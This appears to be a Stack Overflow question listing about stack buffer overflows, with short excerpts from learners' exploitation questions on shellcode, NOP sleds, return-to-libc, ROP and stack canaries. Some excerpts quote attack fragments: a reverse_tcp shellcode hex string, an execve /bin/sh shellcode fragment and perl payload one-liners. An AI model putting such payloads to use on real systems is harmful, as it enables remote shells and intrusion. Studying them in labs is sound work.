
0 votes, 2 answers, 43 views

What is the difference between stack buffer overflow, stack underflow and stack overflow?

My teacher from data structures mentioned it during our lectures today when studying stack, but didn't give proper explanation to it.

2 votes, 1 answer, 118 views

The Shellcode to open Calc.exe too long and complex, can't understand! My first exploit program

I wrote my first exploit program on Windows XP OS using the shellcode I found on the web. It opens the calculator and the overall program works successfully. However, even though I did not write the ...

0 votes, 0 answers, 51 views

ELF-64 corrupted interpreter, what are the possible causes? (seems like an overflow issue)

I have an ELF-64 executable that says "No such file or directory" when executed. Then I proceeded to using the command file <filename> to see what's wrong and indeed the interpreter looks like ...

1 vote, 0 answers, 16 views

Is it possible to crash entire computer from a buffer overflow by overwriting entire stack?

Is it possible to crash the computer by an extremely long buffer overflow? This is more to understand the mechanics of the overflow than the actual consequences. Let's say I run a program without any ...

0 votes, 0 answers, 30 views

Stack buffer overflow and output the character

static const int answer = 0x21072107; int main(int argc, char **argv) { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); int x = 0; char buffer[32]; printf(...

0 votes, 1 answer, 49 views

Stack Alignment - Buffer Overflow Testing

I've done a lot of research trying to understand this topic but still have some confusion. Currently I'm investigating buffer overflow. Here's an example of the function I'm looking at: int ...

-1 votes, 1 answer, 82 views

How do I overflow the buffer with a specific return address?

Here is an array that I was given: char overflow[16]="\xEF\xBE\xAD\xDE\xEF\xBE\xAD\xDE" "\xEF\xBE\xAD\xDE\xEF\xBE\xAD\xDE"; and here is the address: "0x1234B000" how do I edit ...

0 votes, 0 answers, 140 views

Buffer Overflow Exploit : sh: 1: Syntax error: Unterminated quoted string : Developing exploit for personal enrichment

So recently, I've been reading the book Hacking: The Art of Exploitation by Jon Erickson in order to work on my software security skills. This book is starting to get a little bit outdated though, and ...

1 vote, 0 answers, 63 views

Buffer Overflow with Python - Send multiple strings to C's scanf() function

I currently try to do a Buffer Overflow attack to a simple C Program. This Program takes 2 inputs via C's scanf function. The First input is secure, the second is not. So I found my shellcode, the ...

1 vote, 1 answer, 215 views

Linux: Buffer overflow of simple C program is giving SIGBUS

I am a beginner in binary exploitation, and I'm training for the exploitation of buffer overflows. I made a useless short C program: #include <stdio.h> #include <stdlib.h> int main(void) ...

0 votes, 0 answers, 394 views

Buffer overflow works in GDB but not without it. (Extended Version)

My question is pretty much what the title describes, I have read a lot of articles online but none of them explained how can I actually make a workable exploit like ./buf < attack.txt where attack....

0 votes, 1 answer, 544 views

Stack canaries can be disabled by compiler?

Who is responsible for inserting the stack canaries in the stack? Is it the OS? If yes, how can the gcc compiler disable them by using the -fno-stack-protector option? Or it is only a flag created ...

4 votes, 1 answer, 167 views

How do I bypass a return address overwrite not redirecting control flow?

Let me illustrate the problem here This is main (gdb) disass main Dump of assembler code for function main: 0x000000000040057c <+0>: push rbp 0x000000000040057d <+1>: mov rbp,...

1 vote, 1 answer, 51 views

How is temp data stored on the stack frame

Int test(){ char buff[10] printf("Enter text: "); gets(buff); puts(buff); } I don't know how to phrase this question but I'm trying to understand how values are stored on the ...

1 vote, 0 answers, 404 views

Stack based VS heap based buffer overflow

Why is heap-based buffer overflow more difficult than stack-based? Also, what is the difference between them? I know that memory is allocated dynamically in case of heaps but, is that it?

-3 votes, 1 answer, 267 views

C Stack Buffer Overflow

I am trying to replicate a stack buffer overflow. This is my code #include <stdio.h> int main(int argc, char *argv[]) { char x[1]; gets(x); printf("%s\n", x); } I am compiling this on a ...

-1 votes, 1 answer, 106 views

Is there any other ways to make the program print hostname to stdout or just shellcode?

It is a lab assignment asking us to exploit this program. The first task is to call the notcalled function (which is solved by changing the return address to the notcalled function: perl -e 'printf "A"...

2 votes, 1 answer, 857 views

Illegal Instruction when trying to get shell from a simple stackoverflow

I'm trying to exploit the stack overflow vulnerability to get a shell. When I tried to run it, it shows illegal hardware instruction after executing the shellcode instead of giving a shell (error ...

1 vote, 0 answers, 506 views

Why doesn't the reverse_tcp shellcode work?

I am using this shellcode: \x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\xc0\xa8\x0f\x81\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\...

0 votes, 1 answer, 244 views

$esp register not found

I am learning debugging with gdb and registers, but I am stuck in one point. As an instruction, I should print print $esp result: $1 = -9008 but I was expecting such result: $2 = (void *) ...

3 votes, 2 answers, 3k views

Disabling stack protection in GCC not working

I'm trying to recreate a stack buffer overflow using the classic overflow with strcpy using this function: #include <stdio.h> #include <string.h> void main(int argc, char **argv) { ...

5 votes, 3 answers, 3k views

Why is my stack buffer overflow exploit not working?

So I have a really simple stackoverflow: #include <stdio.h> int main(int argc, char *argv[]) { char buf[256]; memcpy(buf, argv[1],strlen(argv[1])); printf(buf); } I'm trying to ...

1 vote, 0 answers, 299 views

\x00 treated as null byte and doesn't count

I'm trying to learn about stack overflow. When I want to overwrite the eip register, I type in my shell this command: run $(perl -e 'print "\xb8\x06\x40\x00" x 20;') It's supposed to overwrite the ...

0 votes, 0 answers, 105 views

ESP after SEH Exception with same program on different computers

Below are a few articles that exploit different programs by using ESP after the SEH exception to POPAD back to a controllable part of the stack. The other article demonstrates stack pivoting finding ...

2 votes, 1 answer, 118 views

First experiments with buffer overflow

I've started reading about buffer overflow and how hackers use it to execute custom code instead of the regular compiled one and now I'm trying to reproduce some basic situations, with a vulnerable ...

-4 votes, 2 answers, 68 views

Undefined computer behavior after running a C program

I am getting right to the point because I cannot explain the situation that I am going to describe. I need your attention please! Yesterday I wrote a program in C. The program takes as input a string ...

1 vote, 1 answer, 228 views

How to prevent stack overflow when dealing with long recursive productions in C?

Given a grammar, how can one avoid stack overflow problem when calculating FIRST and FOLLOW sets in C. The problem arose in my code when I had to recurse through a long production. Example: S->...

4 votes, 1 answer, 2k views

Stack-based buffer overflow - challenge in C using scanf with limited input

As part of a security CS course, my class has been given the task of exploiting a vulnerability to beat a password check using a stack/buffer overflow. The code with the vulnerability is as follows: #...

1 vote, 1 answer, 1k views

Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential

I'm looking at aleph's article on phrack magazine. The code below can also be found there. We have a vulnerable executable which it's code is: vulnerable.c void main(int argc, char *argv[]) { ...

1 vote, 2 answers, 1k views

Exploit Development - Shellcode Doesn't Work?

I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit. Firstly, I found the position of EIP was after the 26089 As (at ...

1 vote, 1 answer, 350 views

segmentation error while injecting shellcode to stack smash

I have been trying to understand how stack overflow attacks work. So far I can successfully redirect the return address to an instruction inside the original code. I have written a shellcode launcher ...

-2 votes, 2 answers, 286 views

How to do Infinite Loop

My aim is to write an infinite loop. I have to print infinitely this string "Hello World %s" and I can just use ROP (Return-oriented programming). gcc -fno-stack-protector loop.c -o loop I can ...

0 votes, 1 answer, 2k views

Nop Sled, can you explain it to me?

I have been reading this book: Hacking, the art of exploitation On page 140, the book explains the Nop Slide: We’ll create a large array (or sled) of these NOP instructions and place it before ...

0 votes, 0 answers, 300 views

Why does variable 'pass' change its value after stack buffer overflow?

I can't understand what's happening with buf1 and pass in main(). I understand that after buffer overflow in gets(buf1): Firstly (by input of more than 15 characters), we are actually changing calling ...

0 votes, 1 answer, 242 views

change the return address to point to shellcode

I'm using Linux and I have a C program. I would like to change the return address to point to my shellcode, but I'm unable to do it. Here is my shellcode "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\...

0 votes, 1 answer, 209 views

Why doesn't putenv(buf) work properly when memcpy(buf + 92, "\x00\x14\xe4\xf7", 4) copies a \x00 byte to buf?

I am using Ubuntu 14.04, so I have the latest kernel. I am trying to do the return-to-libc method. Here is my code to create an environment variable, which will later be input to the victim code #include<...

16 votes, 3 answers, 1k views

Should the memory vulnerability of the line of code "printf("%s", argv[1]);" be described as a stack overflow?

Today, I took a short "C++ skills test" from Elance.com. One question was the following: What is the security vulnerability of the following line of code: printf("%s", argv[1]); Option 1:...

3 votes, 1 answer, 807 views

How to set a gdb watchpoint to a value stored in register?

I'm trying to detect stack overflow in some function, and want to set a watchpoint to a memory pointed by the RSP register. I can't just set a watchpoint to a certain address as the function could be ...

-1 votes, 1 answer, 156 views

Need to detect any possible buffer overflows

Hi guys, I need some help with this code. I want to know if there is any buffer overflow in this code. Basically this is an exercise for my university. We need to exploit it to open a shell. Until now ...

10 votes, 2 answers, 36k views

Malloc segmentation fault

Here is the piece of code in which segmentation fault occurs (the perror is not being called): job = malloc(sizeof(task_t)); if(job == NULL) perror("malloc"); To be more precise, gdb says that ...

2 votes, 2 answers, 371 views

Overflowing a stack in theory... and assembly

Assuming an x86 system with no aslr I'd like to ask the following; 1) Theory says that when we execute a stack overflow attack, the value pointed to by the ebp register is overwritten with the new ...

1 vote, 1 answer, 113 views

Does each process have its own portion of utopia in the memory?

By doing some cat /proc/*some PID*/maps on multiple processes on a machine, I notice they all have the same starting point in regards to memory address, being 0x8048000. Does this mean that every ...

9 votes, 3 answers, 718 views

Smashing the stack example3.c confusion

Article can be found here. I'm reading up on smashing the stack and have found myself to be getting stuck on example3.c. 0x80004a3 <main+19>: call 0x8000470 <function> 0x80004a8 <...

7 votes, 2 answers, 3k views

What is the difference between STATUS_STACK_BUFFER_OVERRUN and STATUS_STACK_OVERFLOW?

I just found out that there is a STATUS_STACK_BUFFER_OVERRUN and a STATUS_STACK_OVERFLOW. What's the difference between those 2? I just found Stack overflow (stack exhaustion) not the same as stack ...

0 votes, 1 answer, 133 views

Are the old days of code injection over? [closed]

I was wondering since all updated operating systems guard against stack and heap type overflows via ASLR, Canary Checks, and other such methods, are memory corruption exploits still prevalent? Given ...

0 votes, 1 answer, 1k views

Rewriting EBP stack return value

Hi, I'm trying to write an overflow exploit for a simple program that I've built. Below is the C program that I've written. #include <unistd.h> #include <string.h> #include <stdio.h>...

2 votes, 5 answers, 4k views

Execution of function pointer to Shellcode

I'm trying to execute this simple opcode for exit(0) call by overwriting the return address of main. The problem is I'm getting segmentation fault. #include <stdio.h> char shellcode[]= "/0xbb/...

0 votes, 2 answers, 383 views

Is buffer-overflow considered a "solved problem"? (at least for future systems)

I am looking at various buffer/heap/stack protection technologies such as PAX, DEP, NX, CANARIES, etc And a new one SMEP - http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-...

8 votes, 1 answer, 4k views

return to libc - problem

I'm having problems with return-to-libc exploit. The problem is that nothing happens, but no segmentation fault (and yes I'm actually overflowing the stack). This is my program: int main(int argc, ...

1 vote, 3 answers, 429 views

Buffer Overflow - Not getting the correct output

The shellcode prints the hostname (bin/hostname), but when I execute the code it shows me the path in reverse order and does not print the HOSTNAME. I am actually doing the buffer overflow. I ...